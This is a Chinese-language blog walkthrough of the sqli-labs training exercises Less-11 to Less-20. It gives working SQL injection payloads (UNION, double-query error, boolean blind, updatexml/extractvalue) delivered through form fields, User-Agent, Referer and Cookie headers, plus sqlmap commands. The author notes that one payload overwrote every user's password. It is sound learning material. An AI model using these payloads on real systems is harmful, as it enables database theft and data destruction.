Less-11
手工注入
1.开始为post类型的注入,先加个单引号,报错如下。
构造出SQL语句应该为:select username,password from users where username=' ' ' and password=' 2' limit 0,1; 也即是password字段被单引号包含了' and password=',导致 出现2' limit 0,1;引号不匹配的情况。下图看起来更直观些。
2.所以,可构造如下语句:' # 。 #把后面的都注释掉,然后在其前面加上自己构造的语句。
3.先用group by 看看有多少列:' group by 1,经过测试,共2个字段。
4.下面,开始使用联合查询:-1' union select 1,2 #返回正常,开始构造语句。
5.查数据库名:' union select 1,database() #
6.接下来查表名,构造和Less-1类似:' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #
7.查列名' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
8.查内容:' union select group_concat(username),group_concat(password) from security.users #
OK,已经得到想要的。
用sqlmap注入
1.首先,使用BurpSuite抓包,然后保存抓取到的内容。例如:保存为use.txt,把它放至某个目录下,这里为:F:/temp/use.txt。
2.首先,判断是否存在SQL注入漏洞,python2 sqlmap.py -r F:/temp/use.txt - --batch 得到两个注入点,如图:
3.查询当前数据库python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db
4.查询表::python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables
5.剩下的查询和Less-1的用法一样,列-内容,一个一个爆即可。
Less-12
1.加单引号,正常,加双引号,报错:
由图可知,为双引号加括号闭合。
2.构造:") #返回正常,所以用Less-11构造的方法构造语句即可。即") 构造的语句 # 不在赘述。
Less-13
1.加单引号,报错,知道为单引号加括号闭合。
2.以为就这样了,结果采用上面的构造方法无用,看来没那么简单,应该使用双查询注入了,和Less-5的构造基本相同。
3.查数据库,构造如下。') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
继续爆其他数据库名,改变limit n,1即可。
4.查表:') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
同样,改变limit n,1即可。
5.查列名:') or (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #
同样,改变limit n,1即可。
6.查内容:') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
同样,改变limit n,1即可。
Less-14
1.加单引号,正常,加双引号,报错,可知为双引号闭合。
2.应该不会直接是联合查询了,一试,果然还是双查询注入。
3.构造:" 构造语句 # 构造语句和less-13一样。
Less-15
1.加单引号,只有“报错”,应该是要盲注,而且只能布尔型或时间型了(只知道错了没压根不知道错的信息)
2.不管,先把注入句式试出来,用万能句型' or 1=1 or '1'='2,经过尝试,为单引号闭合,此时登录成功。
3.开始布尔型盲注:构造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2,其实就是把上面的1=1改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))为true。
4.继续构造:都是把构造好的语句替换1=1,从而查看结果。构造和Less-6差不多,不再赘述。
Less-16
1.还是用万能句型试,最终试出为双引号加括号闭合,即使用") or 1=1 or "1"=("2登录成功。
2.接下来的构造和Less-15一样,如") or 1=(if(substr(version(),1,1)=5,1,0)) or '1'=("2。
Less-17
1.进入页面提示为PASSWORD RESET,即重置密码界面,坑比较多。
2.首先,在user name中尝试了多次,都是让走开,后来一想,确实该走,都提示为重置密码了,还傻傻地在user name试,应该在new password中想办法。后来看了其他大佬的博客后,查看源码才知道原来对user name表单进行了过滤:
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
函数check_input()的作用就是检查用户输入,并将用户输入安全化,其中的mysql_real_escape_string()会在\x00, \n, \r, \, ', " and \x1a这些字符前加入反斜线进行转义,防止注入,而且这个函数也避免了宽字节注入的危险。
3.当然,还不止,new password也不是和之前一样轻易试出注入类型,因为有user name的限制,如果new password不对,那么怎么试都自然是错的。因为看了大佬的解题思路,知道了为单引号闭合,SQL语句为:@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";且知道有用户名为admin(这个用户名一般都有)。所以就直接考虑构造了。
4.首先考虑到不能回显有意义的信息,所以首选前面一直用的双注入查询 构造如下:user name:填admin ,而new password:填' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
剩下的构造不多说,和Less-13一样,一个一个爆就好。
5.在这里,尝试使用一种新的注入方法,基于extractvalue()和updatexml()的报错注入,详情请看: 学习基于extractvalue()和updatexml()的报错注入,同时,下面的注入丢默认user name:填admin
6.先使用updatexml()进行注入,构造为' and updatexml(1,concat('~',(select version())),1)# 获取相应版本:
获取数据库名称:' and updatexml(1,concat('~',(select database())),1)#
获取表名:' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)#
改变limit n,1即可获取其他表名。
获取列名:' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)#
同样,改变limit n,1即可。
获取内容:这样,不行' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)# 报错如下:
这样:也不行' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)# 报错如下:
这样:发现可以了,但是password成了0,一下子把所有的用户密码都改成了0,后面的可能就有问题了。' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
7.使用extractvalue(),和updatexml()十分相似,用法也差不多,甚至看起来跟直观些。构造:' and extractvalue(1,concat('~',(select version())))#
剩下的语句和updatexml()的类似。
Less-18
1.进入后显示Your IP ADDRESS is: ::1,输入常用的注入尝试,都只显示:
看来和上一题一样,都进行了相关的过滤。
2.实在不懂,先看一下源码:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
这次对两个表单都进行过滤了。
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
看到只有用户再登陆成功后才会显示用户的user agent,并且将uagent, ip_address, username插入到了uagents表中。查看一下:
注意到:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
在插入过程中并没有进行过滤,由此可知,可以从uagent下手。本来ip_address也可以成功的,但是源码中显示被注释掉了,回显的只能是用户的user agent
3.构造uagent的内容,使用BurpSuite对提交内容进行抓包,然后再修改相应的User-Agent:
4.易知,只要保证
User-Agent:字段内容,即uagent保持单引号闭合,且使用双查询注入或使用extractvalue()或updatexml()构造相应语句即可(因为是在插入语句中,只能通过报错获取我们想要的信息)。5.构造语句查询数据库名:
构造一:
' and updatexml(1,concat('~',(select database())),1) and '1'='1
构造二:' and extractvalue(1,concat('~',(select database()))) and '1'='1
构造三:' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1
6.其他构造和之前的相似,不再赘述。
Less-19
- 提示为Referer,直接用我们知道的用户名密码都为:
admin的进行尝试,发现:
2.也就是说我们需要将构造语句放入Referer: 尝试:' and extractvalue(1,concat('~',(select database()))) and '1'='1
成功,知道方法就好了。
Less-20
1.提示为Cookie,直接用我们知道的用户名密码都为:admin的进行尝试,发现:
2.Cookie为:uname = admin 所以构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #
3.构造还是一样的。
目前就先到这吧,这部分的题目都是post类型的,后面好像还有,但还是放下一篇吧。当然,文中如有错误或其他更好的语句或解法,还希望诸位不吝赐教,多谢。
